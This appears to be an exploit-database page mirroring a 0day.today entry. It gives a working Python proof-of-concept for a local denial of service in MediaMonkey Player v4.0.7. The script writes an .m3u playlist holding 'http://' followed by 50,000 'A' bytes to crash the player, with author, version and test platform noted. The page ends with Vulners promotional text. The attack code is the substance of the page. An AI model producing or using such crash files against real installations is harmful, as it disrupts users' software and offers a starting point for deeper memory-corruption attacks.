Lucene search
K

MediaMonkey Player v.4.0.7 Local Denial of Service

🗓️ 07 Apr 2013 00:00:00Reported by metacomType 
zdt
 zdt
🔗 0day.today👁 33 Views

MediaMonkey Player v.4.0.7 Local Denial of Service poc

Code
#!/usr/bin/python
# Exploit Title:MediaMonkey Player Local Denial of Service poc
# Date: 04-04-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.chip.de/downloads/MediaMonkey_18736381.html
# Version: MediaMonkey v.4.0.7
# Tested on: Windows 7 German

filename = "MediaMonkey-crash.m3u"

head = "http://"
junk ="\x41" * 50000

payload = head+junk+"\n"
textfile = open(filename , 'w')
textfile.write(payload)
textfile.close()

#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation